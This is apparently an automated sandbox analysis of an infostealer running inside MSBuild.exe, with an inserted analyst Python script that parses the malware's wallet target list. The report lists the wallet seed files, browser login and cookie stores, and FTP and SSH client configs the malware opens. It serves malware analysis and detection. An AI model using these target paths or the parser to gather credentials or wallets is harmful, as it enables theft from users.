Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: Yara match File source: 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR
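As an added analyst example (not part of this report and not the malware's own code), the following Python parser splits the pipe-delimited wallet list recovered from MSBuild.exe memory into records and resolves each one to the directory the "File opened" lines above show the injected MSBuild.exe touching. The five-field layout (name, location code, relative path, file mask, trailing flag), the mapping of location code 1 to AppData\Roaming and 0 to AppData\Local, and the sandbox profile path C:\Users\user are all taken from the report's own lines. Treating code 2 as the user profile root (the ".chia" entries), treating the trailing field as a recurse-into-subdirectories flag, and the function names are assumptions; the sample config is a constructed prefix of the string quoted above.

```python
"""Parse the pipe-delimited wallet target list recovered from MSBuild.exe memory.

Added analyst example, not code from the report or from the malware. Field layout
(name | location code | relative path | file mask | flag) is inferred from the
report: code 1 resolves to AppData\\Roaming and 0 to AppData\\Local, matching the
'File opened' lines. Code 2 (taken here as the user profile root) and the trailing
flag (taken here as 'recurse into subdirectories') are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, List

# Location codes: 0 and 1 are confirmed by the report's behaviour, 2 is assumed.
BASE_DIRS: Dict[str, str] = {
    "0": r"C:\Users\user\AppData\Local",
    "1": r"C:\Users\user\AppData\Roaming",
    "2": r"C:\Users\user",  # assumption: user profile root (for the '.chia' entries)
}

# Constructed sample: a prefix of the config string quoted in the report. Memory
# strings are often cut mid-record, hence the dangling '|0|' at the start.
SAMPLE_CONFIG = (
    r"|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|"
    r"Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\backups\|*.*|1|"
    r"Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|"
    r"Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|"
)

RECORD_FIELDS = 5


@dataclass(frozen=True)
class WalletTarget:
    name: str       # label the stealer uses for the entry
    location: str   # location code, key into BASE_DIRS
    relpath: str    # path below the base directory, e.g. '\Electrum\wallets\'
    mask: str       # file mask applied inside that directory
    recurse: bool   # assumption: trailing '1' means descend into subdirectories

    def resolved_dir(self, base_dirs: Dict[str, str] = BASE_DIRS) -> str:
        """Absolute directory in the same form the report's 'File opened' lines use."""
        base = base_dirs.get(self.location)
        if base is None:
            raise ValueError(f"unknown location code {self.location!r}")
        return base + self.relpath


def parse_wallet_config(blob: str, base_dirs: Dict[str, str] = BASE_DIRS) -> List[WalletTarget]:
    """Split the blob on '|' and read fixed five-field records.

    Resynchronises on the first token that is followed by a known location code
    and a backslash-rooted path, so a blob that starts mid-record still parses.
    """
    tokens = blob.split("|")
    start = next(
        (i for i in range(len(tokens) - 2)
         if tokens[i + 1] in base_dirs and tokens[i + 2].startswith("\\")),
        None,
    )
    if start is None:
        raise ValueError("no wallet record found in blob")
    targets = []
    for i in range(start, len(tokens) - RECORD_FIELDS + 1, RECORD_FIELDS):
        name, loc, relpath, mask, flag = tokens[i:i + RECORD_FIELDS]
        targets.append(WalletTarget(name, loc, relpath, mask, flag == "1"))
    return targets


def explain_open(targets: List[WalletTarget], opened_dir: str,
                 base_dirs: Dict[str, str] = BASE_DIRS) -> List[str]:
    """Names of entries whose resolved directory equals an observed 'File opened' path."""
    wanted = opened_dir.lower()
    return [t.name for t in targets if t.resolved_dir(base_dirs).lower() == wanted]


def watch_list(targets: List[WalletTarget], base_dirs: Dict[str, str] = BASE_DIRS) -> List[str]:
    """Unique target directories, usable as a file-access alerting list."""
    return sorted({t.resolved_dir(base_dirs) for t in targets})


if __name__ == "__main__":
    parsed = parse_wallet_config(SAMPLE_CONFIG)
    for t in parsed:
        print(f"{t.name:12s} {t.resolved_dir()}{t.mask}  recurse={t.recurse}")
    print("explains Exodus backups open:",
          explain_open(parsed, "C:\\Users\\user\\AppData\\Roaming\\Exodus\\backups\\"))
```

The base directories are hard-coded to the sandbox's C:\Users\user profile so the resolved paths line up with the report; on a real host substitute %LOCALAPPDATA%, %APPDATA% and %USERPROFILE%, and feed the full string from the memory dump rather than the constructed prefix.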

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 11.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.KEGIDHJKKJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2205515395.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.f1r6P3j3g7.exe.91dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.f1r6P3j3g7.exe.91dad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.f1r6P3j3g7.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD90C40 sqlite3_bind_zeroblob, 3_2_6CD90C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD90D60 sqlite3_bind_parameter_name, 3_2_6CD90D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCB8EA0 sqlite3_clear_bindings, 3_2_6CCB8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 3_2_6CD90B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCB6410 bind,WSAGetLastError, 3_2_6CCB6410